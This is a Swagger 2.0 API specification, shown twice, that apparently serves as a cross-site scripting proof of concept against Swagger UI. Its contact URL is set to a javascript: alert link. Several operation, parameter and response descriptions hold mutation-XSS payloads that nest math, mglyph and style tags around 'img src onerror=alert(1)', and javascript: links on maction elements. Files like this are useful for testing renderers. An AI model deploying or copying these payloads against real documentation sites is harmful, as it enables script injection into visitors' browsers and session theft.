morentharia/swagger-xss.json

## swagger-xss.json
{
    "swagger": "2.0",
    "info": {
        "version": "1.0.0",
        "title": "Swagger Petstore",
        "contact":{
            "name": "API Support",
            "url": "javascript:alert('xss')"
        }
    },
    "paths": {
        "/pets": {
            "get": {
                "description": "HAHAHAHH<math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title=\"</style><img src onerror='alert(1)'>\"></style></h1>HOHOHOHO",
                "operationId": "findPets",
                "produces": [
                    "application/json",
                    "application/xml",
                    "text/xml",
                    "text/html"
                ],
                "parameters": [
                    {
                        "name": "tags",
                        "in": "query",
                "description": "<div id=\"130\"><math href=\"javascript:alert(130)\">CLICKME</math>\n<math>\n<!-- up to FF 13 -->\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\n\n<!-- FF 14+ -->\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math>//[\"'`-->]]>]</div>HOHOHOH",
                        "required": false,
                        "type": "array",
                        "items": {
                            "type": "string"
                        },
                        "collectionFormat": "csv"
                    },
                    {
                        "name": "limit",
                        "in": "query",
                "description": "HAHAHAHHH\"'>\n<form><math><mtext>\n</form><form>\n<mglyph\n><style></math>\n<img src onerror=alert(1)></script>HOHOHOHO",
                        "required": false,
                        "type": "integer",
                        "format": "int32"
                    }
                ],
                "responses": {
                    "200": {
                "description": "HAHAHAHHH\"'>\n<form><math><mtext>\n</form><form>\n<mglyph\n><style></math>\n<img src onerror=alert(1)></script>HOHOHOHO",
                        "schema": {
                            "type": "string"
                        }
                    },
                    "default": {
                        "description": "unexpected error"
                    }
                }
            }
        }
    }
}
	{
	"swagger": "2.0",
	"info": {
	"version": "1.0.0",
	"title": "Swagger Petstore",
	"contact":{
	"name": "API Support",
	"url": "javascript:alert('xss')"
	}
	},
	"paths": {
	"/pets": {
	"get": {
	"description": "HAHAHAHH<math><mtext><h1><a><h6></a></h6><mglyph><svg><mtext><style><a title=\"</style><img src onerror='alert(1)'>\"></style></h1>HOHOHOHO",
	"operationId": "findPets",
	"produces": [
	"application/json",
	"application/xml",
	"text/xml",
	"text/html"
	],
	"parameters": [
	{
	"name": "tags",
	"in": "query",
	"description": "<div id=\"130\"><math href=\"javascript:alert(130)\">CLICKME</math>\n<math>\n<!-- up to FF 13 -->\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\n\n<!-- FF 14+ -->\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math>//[\"'`-->]]>]</div>HOHOHOH",
	"required": false,
	"type": "array",
	"items": {
	"type": "string"
	},
	"collectionFormat": "csv"
	},
	{
	"name": "limit",
	"in": "query",
	"description": "HAHAHAHHH\"'>\n<form><math><mtext>\n</form><form>\n<mglyph\n><style></math>\n<img src onerror=alert(1)></script>HOHOHOHO",
	"required": false,
	"type": "integer",
	"format": "int32"
	}
	],
	"responses": {
	"200": {
	"description": "HAHAHAHHH\"'>\n<form><math><mtext>\n</form><form>\n<mglyph\n><style></math>\n<img src onerror=alert(1)></script>HOHOHOHO",
	"schema": {
	"type": "string"
	}
	},
	"default": {
	"description": "unexpected error"
	}
	}
	}
	}
	}
	}